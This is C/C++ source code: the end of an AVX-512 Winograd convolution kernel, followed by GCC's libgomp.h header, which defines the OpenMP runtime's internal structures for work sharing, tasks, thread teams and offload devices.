__m512 _sum3 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
__m512 _val2 = _mm512_set1_ps(r0[2]);
__m512 _val3 = _mm512_set1_ps(r0[3]);
_sum2 = _mm512_fmadd_ps(_val2, _w0, _sum2);
_sum3 = _mm512_fmadd_ps(_val3, _w0, _sum3);
r0 += 4;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
_mm512_store_ps(output0_tm + 16 * 2, _sum2);
_mm512_store_ps(output0_tm + 16 * 3, _sum3);
output0_tm += 16 * 4;
}
for (; i + 1 < tiles; i += 2)
{
const float* r0 = bb2.row(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2);
const float* k0 = kernel0_tm.row(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
__m512 _sum1 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
__m512 _val1 = _mm512_set1_ps(r0[1]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
_sum1 = _mm512_fmadd_ps(_val1, _w0, _sum1);
r0 += 2;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
_mm512_store_ps(output0_tm + 16, _sum1);
output0_tm += 16 * 2;
}
for (; i < tiles; i++)
{
const float* r0 = bb2.row<const float>(i / 12 + (i % 12) / 8 + (i % 12 % 8) / 4 + (i % 12 % 4) / 2 + i % 12 % 2);
const float* k0 = kernel0_tm.row<const float>(r);
int nn = inch * 16; // inch always > 0
__m512 _sum0 = _mm512_setzero_ps();
for (int j = 0; j < nn; j++)
{
__m512 _w0 = _mm512_load_ps(k0);
__m512 _val0 = _mm512_set1_ps(r0[0]);
_sum0 = _mm512_fmadd_ps(_val0, _w0, _sum0);
r0 += 1;
k0 += 16;
}
_mm512_store_ps(output0_tm, _sum0);
output0_tm += 16;
}
}
}
}
bottom_blob_tm = Mat();
// END dot
// BEGIN transform output
Mat top_blob_bordered;
if (outw == top_blob.w && outh == top_blob.h)
{
top_blob_bordered = top_blob;
}
else
{
top_blob_bordered.create(outw, outh, outch, elemsize, elempack, opt.workspace_allocator);
}
{
conv3x3s1_winograd43_transform_output_pack16_avx512(top_blob_tm, top_blob_bordered, bias, opt);
}
// END transform output
// cut result pad
copy_cut_border(top_blob_bordered, top_blob, 0, top_blob_bordered.h - top_blob.h, 0, top_blob_bordered.w - top_blob.w, opt);
}
|
libgomp.h | /* Copyright (C) 2005-2018 Free Software Foundation, Inc.
Contributed by Richard Henderson <rth@redhat.com>.
This file is part of the GNU Offloading and Multi Processing Library
(libgomp).
Libgomp is free software; you can redistribute it and/or modify it
under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3, or (at your option)
any later version.
Libgomp is distributed in the hope that it will be useful, but WITHOUT ANY
WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
FOR A PARTICULAR PURPOSE. See the GNU General Public License for
more details.
Under Section 7 of GPL version 3, you are granted additional
permissions described in the GCC Runtime Library Exception, version
3.1, as published by the Free Software Foundation.
You should have received a copy of the GNU General Public License and
a copy of the GCC Runtime Library Exception along with this program;
see the files COPYING3 and COPYING.RUNTIME respectively. If not, see
<http://www.gnu.org/licenses/>. */
/* This file contains data types and function declarations that are not
part of the official OpenACC or OpenMP user interfaces. There are
declarations in here that are part of the GNU Offloading and Multi
Processing ABI, in that the compiler is required to know about them
and use them.
The convention is that the all-caps prefix "GOMP" is used to group items
that are part of the external ABI, and the lower case prefix "gomp"
is used to group items that are completely private to the library. */
#ifndef LIBGOMP_H
#define LIBGOMP_H 1
#ifndef _LIBGOMP_CHECKING_
/* Define to 1 to perform internal sanity checks. */
#define _LIBGOMP_CHECKING_ 0
#endif
#include "config.h"
#include "gstdint.h"
#include "libgomp-plugin.h"
#ifdef HAVE_PTHREAD_H
#include <pthread.h>
#endif
#include <stdbool.h>
#include <stdlib.h>
#include <stdarg.h>
/* Needed for memset in priority_queue.c. */
#if _LIBGOMP_CHECKING_
# ifdef STRING_WITH_STRINGS
# include <string.h>
# include <strings.h>
# else
# ifdef HAVE_STRING_H
# include <string.h>
# else
# ifdef HAVE_STRINGS_H
# include <strings.h>
# endif
# endif
# endif
#endif
#ifdef HAVE_ATTRIBUTE_VISIBILITY
# pragma GCC visibility push(hidden)
#endif
/* If we were a C++ library, we'd get this from <std/atomic>. */
enum memmodel
{
MEMMODEL_RELAXED = 0,
MEMMODEL_CONSUME = 1,
MEMMODEL_ACQUIRE = 2,
MEMMODEL_RELEASE = 3,
MEMMODEL_ACQ_REL = 4,
MEMMODEL_SEQ_CST = 5
};
/* alloc.c */
extern void *gomp_malloc (size_t) __attribute__((malloc));
extern void *gomp_malloc_cleared (size_t) __attribute__((malloc));
extern void *gomp_realloc (void *, size_t);
/* Avoid conflicting prototypes of alloca() in system headers by using
GCC's builtin alloca(). */
#define gomp_alloca(x) __builtin_alloca(x)
/* error.c */
extern void gomp_vdebug (int, const char *, va_list);
extern void gomp_debug (int, const char *, ...)
__attribute__ ((format (printf, 2, 3)));
#define gomp_vdebug(KIND, FMT, VALIST) \
do { \
if (__builtin_expect (gomp_debug_var, 0)) \
(gomp_vdebug) ((KIND), (FMT), (VALIST)); \
} while (0)
#define gomp_debug(KIND, ...) \
do { \
if (__builtin_expect (gomp_debug_var, 0)) \
(gomp_debug) ((KIND), __VA_ARGS__); \
} while (0)
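/* Usage note: with these wrappers a call such as gomp_debug (0, "x %d", x)
   evaluates its arguments only inside the __builtin_expect branch, i.e. only
   when gomp_debug_var is set at runtime. */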
extern void gomp_verror (const char *, va_list);
extern void gomp_error (const char *, ...)
__attribute__ ((format (printf, 1, 2)));
extern void gomp_vfatal (const char *, va_list)
__attribute__ ((noreturn));
extern void gomp_fatal (const char *, ...)
__attribute__ ((noreturn, format (printf, 1, 2)));
struct gomp_task;
struct gomp_taskgroup;
struct htab;
#include "priority_queue.h"
#include "sem.h"
#include "mutex.h"
#include "bar.h"
#include "simple-bar.h"
#include "ptrlock.h"
/* This structure contains the data to control one work-sharing construct,
either a LOOP (FOR/DO) or a SECTIONS. */
enum gomp_schedule_type
{
GFS_RUNTIME,
GFS_STATIC,
GFS_DYNAMIC,
GFS_GUIDED,
GFS_AUTO
};
struct gomp_doacross_work_share
{
union {
/* chunk_size copy, as ws->chunk_size is multiplied by incr for
GFS_DYNAMIC. */
long chunk_size;
/* Likewise, but for ull implementation. */
unsigned long long chunk_size_ull;
/* For schedule(static,0) this is the number
of iterations assigned to the last thread, i.e. number of
iterations / number of threads. */
long q;
/* Likewise, but for ull implementation. */
unsigned long long q_ull;
};
/* Size of each array entry (padded to cache line size). */
unsigned long elt_sz;
/* Number of dimensions in sink vectors. */
unsigned int ncounts;
/* True if the iterations can be flattened. */
bool flattened;
/* Actual array (of elt_sz sized units), aligned to cache line size.
This is indexed by team_id for GFS_STATIC and outermost iteration
/ chunk_size for other schedules. */
unsigned char *array;
/* These two are only used for schedule(static,0). */
/* This one is number of iterations % number of threads. */
long t;
union {
/* And this one is cached t * (q + 1). */
long boundary;
/* Likewise, but for the ull implementation. */
unsigned long long boundary_ull;
};
/* Array of shift counts for each dimension if they can be flattened. */
unsigned int shift_counts[];
};
struct gomp_work_share
{
/* This member records the SCHEDULE clause to be used for this construct.
The user specification of "runtime" will already have been resolved.
If this is a SECTIONS construct, this value will always be DYNAMIC. */
enum gomp_schedule_type sched;
int mode;
union {
struct {
/* This is the chunk_size argument to the SCHEDULE clause. */
long chunk_size;
/* This is the iteration end point. If this is a SECTIONS construct,
this is the number of contained sections. */
long end;
/* This is the iteration step. If this is a SECTIONS construct, this
is always 1. */
long incr;
};
struct {
/* The same as above, but for the unsigned long long loop variants. */
unsigned long long chunk_size_ull;
unsigned long long end_ull;
unsigned long long incr_ull;
};
};
union {
/* This is a circular queue that details which threads will be allowed
into the ordered region and in which order. When a thread allocates
iterations on which it is going to work, it also registers itself at
the end of the array. When a thread reaches the ordered region, it
checks to see if it is the one at the head of the queue. If not, it
blocks on its RELEASE semaphore. */
unsigned *ordered_team_ids;
/* This is a pointer to DOACROSS work share data. */
struct gomp_doacross_work_share *doacross;
};
/* This is the number of threads that have registered themselves in
the circular queue ordered_team_ids. */
unsigned ordered_num_used;
/* This is the team_id of the currently acknowledged owner of the ordered
section, or -1u if the ordered section has not been acknowledged by
any thread. This is distinguished from the thread that is *allowed*
to take the section next. */
unsigned ordered_owner;
/* This is the index into the circular queue ordered_team_ids of the
current thread that's allowed into the ordered region. */
unsigned ordered_cur;
/* This is a chain of allocated gomp_work_share blocks, valid only
in the first gomp_work_share struct in the block. */
struct gomp_work_share *next_alloc;
/* The above fields are written once during workshare initialization,
or related to ordered worksharing. Make sure the following fields
are in a different cache line. */
/* This lock protects the update of the following members. */
gomp_mutex_t lock __attribute__((aligned (64)));
/* This is the count of the number of threads that have exited the work
share construct. If the construct was marked nowait, they have moved on
to other work; otherwise they're blocked on a barrier. The last member
of the team to exit the work share construct must deallocate it. */
unsigned threads_completed;
union {
/* This is the next iteration value to be allocated. In the case of
GFS_STATIC loops, this is the iteration start point and never changes. */
long next;
/* The same, but with unsigned long long type. */
unsigned long long next_ull;
/* This is the returned data structure for SINGLE COPYPRIVATE. */
void *copyprivate;
};
union {
/* Link to gomp_work_share struct for next work sharing construct
encountered after this one. */
gomp_ptrlock_t next_ws;
/* gomp_work_share structs are chained in the free work share cache
through this. */
struct gomp_work_share *next_free;
};
/* If only a few threads are in the team, ordered_team_ids can point
to this array, which fills the padding at the end of this struct. */
unsigned inline_ordered_team_ids[0];
};
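/* Illustrative sketch, not part of libgomp: the test a thread would
   perform on reaching an ORDERED region, following the circular-queue
   scheme described above.  The thread proceeds only when its team_id is
   at the head of ordered_team_ids; otherwise it blocks on its RELEASE
   semaphore.  */
static inline int
example_ordered_my_turn (struct gomp_work_share *ws, unsigned team_id)
{
  return ws->ordered_team_ids[ws->ordered_cur] == team_id;
}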
/* This structure contains all of the thread-local data associated with
a thread team. This is the data that must be saved when a thread
encounters a nested PARALLEL construct. */
struct gomp_team_state
{
/* This is the team of which the thread is currently a member. */
struct gomp_team *team;
/* This is the work share construct which this thread is currently
processing. Recall that with NOWAIT, not all threads may be
processing the same construct. */
struct gomp_work_share *work_share;
/* This is the previous work share construct or NULL if there wasn't any.
When all threads are done with the current work sharing construct,
the previous one can be freed. The current one can't, as its
next_ws field is used. */
struct gomp_work_share *last_work_share;
/* This is the ID of this thread within the team. This value is
guaranteed to be between 0 and N-1, where N is the number of
threads in the team. */
unsigned team_id;
/* Nesting level. */
unsigned level;
/* Active nesting level. Only active parallel regions are counted. */
unsigned active_level;
/* Place-partition-var, offset and length into gomp_places_list array. */
unsigned place_partition_off;
unsigned place_partition_len;
#ifdef HAVE_SYNC_BUILTINS
/* Number of single stmts encountered. */
unsigned long single_count;
#endif
/* For GFS_RUNTIME loops that resolved to GFS_STATIC, this is the
trip number through the loop. So first time a particular loop
is encountered this number is 0, the second time through the loop
is 1, etc. This is unused when the compiler knows in advance that
the loop is statically scheduled. */
unsigned long static_trip;
};
struct target_mem_desc;
/* These are the OpenMP 4.0 Internal Control Variables described in
section 2.3.1. Those described as having one copy per task are
stored within the structure; those described as having one copy
for the whole program are (naturally) global variables. */
struct gomp_task_icv
{
unsigned long nthreads_var;
enum gomp_schedule_type run_sched_var;
int run_sched_chunk_size;
int default_device_var;
unsigned int thread_limit_var;
bool dyn_var;
bool nest_var;
char bind_var;
/* Internal ICV. */
struct target_mem_desc *target_data;
};
extern struct gomp_task_icv gomp_global_icv;
#ifndef HAVE_SYNC_BUILTINS
extern gomp_mutex_t gomp_managed_threads_lock;
#endif
extern unsigned long gomp_max_active_levels_var;
extern bool gomp_cancel_var;
extern int gomp_max_task_priority_var;
extern unsigned long long gomp_spin_count_var, gomp_throttled_spin_count_var;
extern unsigned long gomp_available_cpus, gomp_managed_threads;
extern unsigned long *gomp_nthreads_var_list, gomp_nthreads_var_list_len;
extern char *gomp_bind_var_list;
extern unsigned long gomp_bind_var_list_len;
extern void **gomp_places_list;
extern unsigned long gomp_places_list_len;
extern unsigned int gomp_num_teams_var;
extern int gomp_debug_var;
extern int goacc_device_num;
extern char *goacc_device_type;
enum gomp_task_kind
{
/* Implicit task. */
GOMP_TASK_IMPLICIT,
/* Undeferred task. */
GOMP_TASK_UNDEFERRED,
/* Task created by GOMP_task and waiting to be run. */
GOMP_TASK_WAITING,
/* Task currently executing or scheduled and about to execute. */
GOMP_TASK_TIED,
/* Used for target tasks that have vars mapped and async run started,
but not yet completed. Once that completes, they will be re-added
into the queues as GOMP_TASK_WAITING in order to perform the var
unmapping. */
GOMP_TASK_ASYNC_RUNNING
};
struct gomp_task_depend_entry
{
/* Address of dependency. */
void *addr;
struct gomp_task_depend_entry *next;
struct gomp_task_depend_entry *prev;
/* Task that provides the dependency in ADDR. */
struct gomp_task *task;
/* Depend entry is of type "IN". */
bool is_in;
bool redundant;
bool redundant_out;
};
struct gomp_dependers_vec
{
size_t n_elem;
size_t allocated;
struct gomp_task *elem[];
};
/* Used when in GOMP_taskwait or in gomp_task_maybe_wait_for_dependencies. */
struct gomp_taskwait
{
bool in_taskwait;
bool in_depend_wait;
/* Number of tasks we are waiting for. */
size_t n_depend;
gomp_sem_t taskwait_sem;
};
/* This structure describes a "task" to be run by a thread. */
struct gomp_task
{
/* Parent of this task. */
struct gomp_task *parent;
/* Children of this task. */
struct priority_queue children_queue;
/* Taskgroup this task belongs in. */
struct gomp_taskgroup *taskgroup;
/* Tasks that depend on this task. */
struct gomp_dependers_vec *dependers;
struct htab *depend_hash;
struct gomp_taskwait *taskwait;
/* Number of items in DEPEND. */
size_t depend_count;
/* Number of tasks this task depends on. Once this counter reaches
0, we have no unsatisfied dependencies, and this task can be put
into the various queues to be scheduled. */
size_t num_dependees;
/* Priority of this task. */
int priority;
/* The priority node for this task in each of the different queues.
We put this here to avoid allocating space for each priority
node. Then we play offsetof() games to convert between pnode[]
entries and the gomp_task in which they reside. */
struct priority_node pnode[3];
struct gomp_task_icv icv;
void (*fn) (void *);
void *fn_data;
enum gomp_task_kind kind;
bool in_tied_task;
bool final_task;
bool copy_ctors_done;
/* Set for undeferred tasks with unsatisfied dependencies which
block further execution of their parent until the dependencies
are satisfied. */
bool parent_depends_on;
/* Dependencies provided and/or needed for this task. DEPEND_COUNT
is the number of items available. */
struct gomp_task_depend_entry depend[];
};
/* This structure describes a single #pragma omp taskgroup. */
struct gomp_taskgroup
{
struct gomp_taskgroup *prev;
/* Queue of tasks that belong in this taskgroup. */
struct priority_queue taskgroup_queue;
bool in_taskgroup_wait;
bool cancelled;
gomp_sem_t taskgroup_sem;
size_t num_children;
};
/* Various state of OpenMP async offloading tasks. */
enum gomp_target_task_state
{
GOMP_TARGET_TASK_DATA,
GOMP_TARGET_TASK_BEFORE_MAP,
GOMP_TARGET_TASK_FALLBACK,
GOMP_TARGET_TASK_READY_TO_RUN,
GOMP_TARGET_TASK_RUNNING,
GOMP_TARGET_TASK_FINISHED
};
/* This structure describes a target task. */
struct gomp_target_task
{
struct gomp_device_descr *devicep;
void (*fn) (void *);
size_t mapnum;
size_t *sizes;
unsigned short *kinds;
unsigned int flags;
enum gomp_target_task_state state;
struct target_mem_desc *tgt;
struct gomp_task *task;
struct gomp_team *team;
/* Device-specific target arguments. */
void **args;
void *hostaddrs[];
};
/* This structure describes a "team" of threads. These are the threads
that are spawned by a PARALLEL construct, as well as the work sharing
constructs that the team encounters. */
struct gomp_team
{
/* This is the number of threads in the current team. */
unsigned nthreads;
/* This is number of gomp_work_share structs that have been allocated
as a block last time. */
unsigned work_share_chunk;
/* This is the saved team state that applied to a master thread before
the current thread was created. */
struct gomp_team_state prev_ts;
/* This semaphore should be used by the master thread instead of its
"native" semaphore in the thread structure. Required for nested
parallels, as the master is a member of two teams. */
gomp_sem_t master_release;
/* This points to an array with pointers to the release semaphore
of the threads in the team. */
gomp_sem_t **ordered_release;
/* List of work shares on which gomp_fini_work_share hasn't been
called yet. If the team hasn't been cancelled, this should be
equal to each thr->ts.work_share, but otherwise it can be a possibly
long list of workshares. */
struct gomp_work_share *work_shares_to_free;
/* List of gomp_work_share structs chained through next_free fields.
This is populated and taken off only by the first thread in the
team encountering a new work sharing construct, in a critical
section. */
struct gomp_work_share *work_share_list_alloc;
/* List of gomp_work_share structs freed by free_work_share. New
entries are atomically added to the start of the list, and
alloc_work_share can safely only move all but the first entry
to work_share_list_alloc, as free_work_share can happen concurrently
with alloc_work_share. */
struct gomp_work_share *work_share_list_free;
#ifdef HAVE_SYNC_BUILTINS
/* Number of simple single regions encountered by threads in this
team. */
unsigned long single_count;
#else
/* Mutex protecting addition of workshares to work_share_list_free. */
gomp_mutex_t work_share_list_free_lock;
#endif
/* This barrier is used for most synchronization of the team. */
gomp_barrier_t barrier;
/* Initial work shares, to avoid allocating any gomp_work_share
structs in the common case. */
struct gomp_work_share work_shares[8];
gomp_mutex_t task_lock;
/* Scheduled tasks. */
struct priority_queue task_queue;
/* Number of all GOMP_TASK_{WAITING,TIED} tasks in the team. */
unsigned int task_count;
/* Number of GOMP_TASK_WAITING tasks currently waiting to be scheduled. */
unsigned int task_queued_count;
/* Number of GOMP_TASK_{WAITING,TIED} tasks currently running
directly in gomp_barrier_handle_tasks; tasks spawned
from e.g. GOMP_taskwait or GOMP_taskgroup_end don't count, even when
that is called from a task run from gomp_barrier_handle_tasks.
task_running_count should always be <= team->nthreads, and if the
current task isn't in_tied_task, then it will be strictly
less than team->nthreads. */
unsigned int task_running_count;
int work_share_cancelled;
int team_cancelled;
/* This array contains structures for implicit tasks. */
struct gomp_task implicit_task[];
};
/* This structure contains all data that is private to libgomp and is
allocated per thread. */
struct gomp_thread
{
/* This is the function that the thread should run upon launch. */
void (*fn) (void *data);
void *data;
/* This is the current team state for this thread. The ts.team member
is NULL only if the thread is idle. */
struct gomp_team_state ts;
/* This is the task that the thread is currently executing. */
struct gomp_task *task;
/* This semaphore is used for ordered loops. */
gomp_sem_t release;
/* Place this thread is bound to plus one, or zero if not bound
to any place. */
unsigned int place;
/* User pthread thread pool */
struct gomp_thread_pool *thread_pool;
};
struct gomp_thread_pool
{
/* This array manages threads spawned from the top level, which will
return to the idle loop once the current PARALLEL construct ends. */
struct gomp_thread **threads;
unsigned threads_size;
unsigned threads_used;
/* The last team is used for non-nested teams to delay their destruction to
make sure all the threads in the team move on to the pool's barrier before
the team's barrier is destroyed. */
struct gomp_team *last_team;
/* Number of threads running in this contention group. */
unsigned long threads_busy;
/* This barrier holds and releases threads waiting in thread pools. */
gomp_simple_barrier_t threads_dock;
};
enum gomp_cancel_kind
{
GOMP_CANCEL_PARALLEL = 1,
GOMP_CANCEL_LOOP = 2,
GOMP_CANCEL_FOR = GOMP_CANCEL_LOOP,
GOMP_CANCEL_DO = GOMP_CANCEL_LOOP,
GOMP_CANCEL_SECTIONS = 4,
GOMP_CANCEL_TASKGROUP = 8
};
/* ... and here is that TLS data. */
#if defined __nvptx__
extern struct gomp_thread *nvptx_thrs __attribute__((shared));
static inline struct gomp_thread *gomp_thread (void)
{
int tid;
asm ("mov.u32 %0, %%tid.y;" : "=r" (tid));
return nvptx_thrs + tid;
}
#elif defined HAVE_TLS || defined USE_EMUTLS
extern __thread struct gomp_thread gomp_tls_data;
static inline struct gomp_thread *gomp_thread (void)
{
return &gomp_tls_data;
}
#else
extern pthread_key_t gomp_tls_key;
static inline struct gomp_thread *gomp_thread (void)
{
return pthread_getspecific (gomp_tls_key);
}
#endif
extern struct gomp_task_icv *gomp_new_icv (void);
/* Here's how to access the current copy of the ICVs. */
static inline struct gomp_task_icv *gomp_icv (bool write)
{
struct gomp_task *task = gomp_thread ()->task;
if (task)
return &task->icv;
else if (write)
return gomp_new_icv ();
else
return &gomp_global_icv;
}
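/* Illustrative sketch of how a setter in the style of omp_set_num_threads
   would use gomp_icv: request a writable copy of the ICVs, then update
   the per-task value.  A hedged example, not the actual libgomp
   definition.  */
static inline void
example_set_num_threads (int n)
{
  struct gomp_task_icv *icv = gomp_icv (true);
  icv->nthreads_var = n > 0 ? n : 1;
}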
#ifdef LIBGOMP_USE_PTHREADS
/* The attributes to be used during thread creation. */
extern pthread_attr_t gomp_thread_attr;
extern pthread_key_t gomp_thread_destructor;
#endif
/* Function prototypes. */
/* affinity.c */
extern void gomp_init_affinity (void);
#ifdef LIBGOMP_USE_PTHREADS
extern void gomp_init_thread_affinity (pthread_attr_t *, unsigned int);
#endif
extern void **gomp_affinity_alloc (unsigned long, bool);
extern void gomp_affinity_init_place (void *);
extern bool gomp_affinity_add_cpus (void *, unsigned long, unsigned long,
long, bool);
extern bool gomp_affinity_remove_cpu (void *, unsigned long);
extern bool gomp_affinity_copy_place (void *, void *, long);
extern bool gomp_affinity_same_place (void *, void *);
extern bool gomp_affinity_finalize_place_list (bool);
extern bool gomp_affinity_init_level (int, unsigned long, bool);
extern void gomp_affinity_print_place (void *);
extern void gomp_get_place_proc_ids_8 (int, int64_t *);
/* iter.c */
extern int gomp_iter_static_next (long *, long *);
extern bool gomp_iter_dynamic_next_locked (long *, long *);
extern bool gomp_iter_guided_next_locked (long *, long *);
#ifdef HAVE_SYNC_BUILTINS
extern bool gomp_iter_dynamic_next (long *, long *);
extern bool gomp_iter_guided_next (long *, long *);
#endif
/* iter_ull.c */
extern int gomp_iter_ull_static_next (unsigned long long *,
unsigned long long *);
extern bool gomp_iter_ull_dynamic_next_locked (unsigned long long *,
unsigned long long *);
extern bool gomp_iter_ull_guided_next_locked (unsigned long long *,
unsigned long long *);
#if defined HAVE_SYNC_BUILTINS && defined __LP64__
extern bool gomp_iter_ull_dynamic_next (unsigned long long *,
unsigned long long *);
extern bool gomp_iter_ull_guided_next (unsigned long long *,
unsigned long long *);
#endif
/* ordered.c */
extern void gomp_ordered_first (void);
extern void gomp_ordered_last (void);
extern void gomp_ordered_next (void);
extern void gomp_ordered_static_init (void);
extern void gomp_ordered_static_next (void);
extern void gomp_ordered_sync (void);
extern void gomp_doacross_init (unsigned, long *, long);
extern void gomp_doacross_ull_init (unsigned, unsigned long long *,
unsigned long long);
/* parallel.c */
extern unsigned gomp_resolve_num_threads (unsigned, unsigned);
/* proc.c (in config/) */
extern void gomp_init_num_threads (void);
extern unsigned gomp_dynamic_max_threads (void);
/* task.c */
extern void gomp_init_task (struct gomp_task *, struct gomp_task *,
struct gomp_task_icv *);
extern void gomp_end_task (void);
extern void gomp_barrier_handle_tasks (gomp_barrier_state_t);
extern void gomp_task_maybe_wait_for_dependencies (void **);
extern bool gomp_create_target_task (struct gomp_device_descr *,
void (*) (void *), size_t, void **,
size_t *, unsigned short *, unsigned int,
void **, void **,
enum gomp_target_task_state);
static inline void
gomp_finish_task (struct gomp_task *task)
{
if (__builtin_expect (task->depend_hash != NULL, 0))
free (task->depend_hash);
}
/* team.c */
extern struct gomp_team *gomp_new_team (unsigned);
extern void gomp_team_start (void (*) (void *), void *, unsigned,
unsigned, struct gomp_team *);
extern void gomp_team_end (void);
extern void gomp_free_thread (void *);
/* target.c */
extern void gomp_init_targets_once (void);
extern int gomp_get_num_devices (void);
extern bool gomp_target_task_fn (void *);
/* Splay tree definitions. */
typedef struct splay_tree_node_s *splay_tree_node;
typedef struct splay_tree_s *splay_tree;
typedef struct splay_tree_key_s *splay_tree_key;
struct target_var_desc {
/* Splay key. */
splay_tree_key key;
/* True if data should be copied from device to host at the end. */
bool copy_from;
/* True if data always should be copied from device to host at the end. */
bool always_copy_from;
/* Relative offset against key host_start. */
uintptr_t offset;
/* Actual length. */
uintptr_t length;
};
struct target_mem_desc {
/* Reference count. */
uintptr_t refcount;
/* All the splay nodes allocated together. */
splay_tree_node array;
/* Start of the target region. */
uintptr_t tgt_start;
/* End of the target region. */
uintptr_t tgt_end;
/* Handle to free. */
void *to_free;
/* Previous target_mem_desc. */
struct target_mem_desc *prev;
/* Number of items in following list. */
size_t list_count;
/* Corresponding target device descriptor. */
struct gomp_device_descr *device_descr;
/* List of target items to remove (or decrease refcount)
at the end of region. */
struct target_var_desc list[];
};
/* Special value for refcount - infinity. */
#define REFCOUNT_INFINITY (~(uintptr_t) 0)
/* Special value for refcount - tgt_offset contains target address of the
artificial pointer to "omp declare target link" object. */
#define REFCOUNT_LINK (~(uintptr_t) 1)
struct splay_tree_key_s {
/* Address of the host object. */
uintptr_t host_start;
/* Address immediately after the host object. */
uintptr_t host_end;
/* Descriptor of the target memory. */
struct target_mem_desc *tgt;
/* Offset from tgt->tgt_start to the start of the target object. */
uintptr_t tgt_offset;
/* Reference count. */
uintptr_t refcount;
/* Pointer to the original mapping of "omp declare target link" object. */
splay_tree_key link_key;
};
/* The comparison function. */
static inline int
splay_compare (splay_tree_key x, splay_tree_key y)
{
if (x->host_start == x->host_end
&& y->host_start == y->host_end)
return 0;
if (x->host_end <= y->host_start)
return -1;
if (x->host_start >= y->host_end)
return 1;
return 0;
}
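/* Illustrative sketch, not part of libgomp: because overlapping ranges
   compare equal, probing with a one-byte key [addr, addr + 1) matches any
   mapped region containing ADDR.  This is how range lookups against the
   splay tree behave.  */
static inline int
example_key_contains (splay_tree_key region, uintptr_t addr)
{
  struct splay_tree_key_s probe;
  probe.host_start = addr;
  probe.host_end = addr + 1;
  return splay_compare (&probe, region) == 0;
}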
#include "splay-tree.h"
typedef struct acc_dispatch_t
{
/* This is a linked list of data mapped using the
acc_map_data/acc_unmap_data or "acc enter data"/"acc exit data" pragmas.
Unlike mapped_data in the goacc_thread struct, unmapping can
happen out-of-order with respect to mapping. */
/* This is guarded by the lock in the "outer" struct gomp_device_descr. */
struct target_mem_desc *data_environ;
/* Execute. */
__typeof (GOMP_OFFLOAD_openacc_exec) *exec_func;
/* Async cleanup callback registration. */
__typeof (GOMP_OFFLOAD_openacc_register_async_cleanup)
*register_async_cleanup_func;
/* Asynchronous routines. */
__typeof (GOMP_OFFLOAD_openacc_async_test) *async_test_func;
__typeof (GOMP_OFFLOAD_openacc_async_test_all) *async_test_all_func;
__typeof (GOMP_OFFLOAD_openacc_async_wait) *async_wait_func;
__typeof (GOMP_OFFLOAD_openacc_async_wait_async) *async_wait_async_func;
__typeof (GOMP_OFFLOAD_openacc_async_wait_all) *async_wait_all_func;
__typeof (GOMP_OFFLOAD_openacc_async_wait_all_async)
*async_wait_all_async_func;
__typeof (GOMP_OFFLOAD_openacc_async_set_async) *async_set_async_func;
/* Create/destroy TLS data. */
__typeof (GOMP_OFFLOAD_openacc_create_thread_data) *create_thread_data_func;
__typeof (GOMP_OFFLOAD_openacc_destroy_thread_data)
*destroy_thread_data_func;
/* NVIDIA target specific routines. */
struct {
__typeof (GOMP_OFFLOAD_openacc_cuda_get_current_device)
*get_current_device_func;
__typeof (GOMP_OFFLOAD_openacc_cuda_get_current_context)
*get_current_context_func;
__typeof (GOMP_OFFLOAD_openacc_cuda_get_stream) *get_stream_func;
__typeof (GOMP_OFFLOAD_openacc_cuda_set_stream) *set_stream_func;
} cuda;
} acc_dispatch_t;
/* Various state of the accelerator device. */
enum gomp_device_state
{
GOMP_DEVICE_UNINITIALIZED,
GOMP_DEVICE_INITIALIZED,
GOMP_DEVICE_FINALIZED
};
/* This structure describes an accelerator device.
It contains the name of the corresponding libgomp plugin, function
handlers for interaction with the device, the ID number of the device,
and information about mapped memory. */
struct gomp_device_descr
{
/* Immutable data, which is only set during initialization, and which is not
guarded by the lock. */
/* The name of the device. */
const char *name;
/* Capabilities of device (supports OpenACC, OpenMP). */
unsigned int capabilities;
/* This is the ID number of device among devices of the same type. */
int target_id;
/* This is the TYPE of device. */
enum offload_target_type type;
/* Function handlers. */
__typeof (GOMP_OFFLOAD_get_name) *get_name_func;
__typeof (GOMP_OFFLOAD_get_caps) *get_caps_func;
__typeof (GOMP_OFFLOAD_get_type) *get_type_func;
__typeof (GOMP_OFFLOAD_get_num_devices) *get_num_devices_func;
__typeof (GOMP_OFFLOAD_init_device) *init_device_func;
__typeof (GOMP_OFFLOAD_fini_device) *fini_device_func;
__typeof (GOMP_OFFLOAD_version) *version_func;
__typeof (GOMP_OFFLOAD_load_image) *load_image_func;
__typeof (GOMP_OFFLOAD_unload_image) *unload_image_func;
__typeof (GOMP_OFFLOAD_alloc) *alloc_func;
__typeof (GOMP_OFFLOAD_free) *free_func;
__typeof (GOMP_OFFLOAD_dev2host) *dev2host_func;
__typeof (GOMP_OFFLOAD_host2dev) *host2dev_func;
__typeof (GOMP_OFFLOAD_dev2dev) *dev2dev_func;
__typeof (GOMP_OFFLOAD_can_run) *can_run_func;
__typeof (GOMP_OFFLOAD_run) *run_func;
__typeof (GOMP_OFFLOAD_async_run) *async_run_func;
/* Splay tree containing information about mapped memory regions. */
struct splay_tree_s mem_map;
/* Mutex for the mutable data. */
gomp_mutex_t lock;
/* Current state of the device. OpenACC allows moving from the INITIALIZED
state back to the UNINITIALIZED state. OpenMP only allows moving from
INITIALIZED to FINALIZED (at program shutdown). */
enum gomp_device_state state;
/* OpenACC-specific data and functions. */
/* This is mutable because of its mutable data_environ and target_data
members. */
acc_dispatch_t openacc;
};
/* Kind of the pragma, for which gomp_map_vars () is called. */
enum gomp_map_vars_kind
{
GOMP_MAP_VARS_OPENACC,
GOMP_MAP_VARS_TARGET,
GOMP_MAP_VARS_DATA,
GOMP_MAP_VARS_ENTER_DATA
};
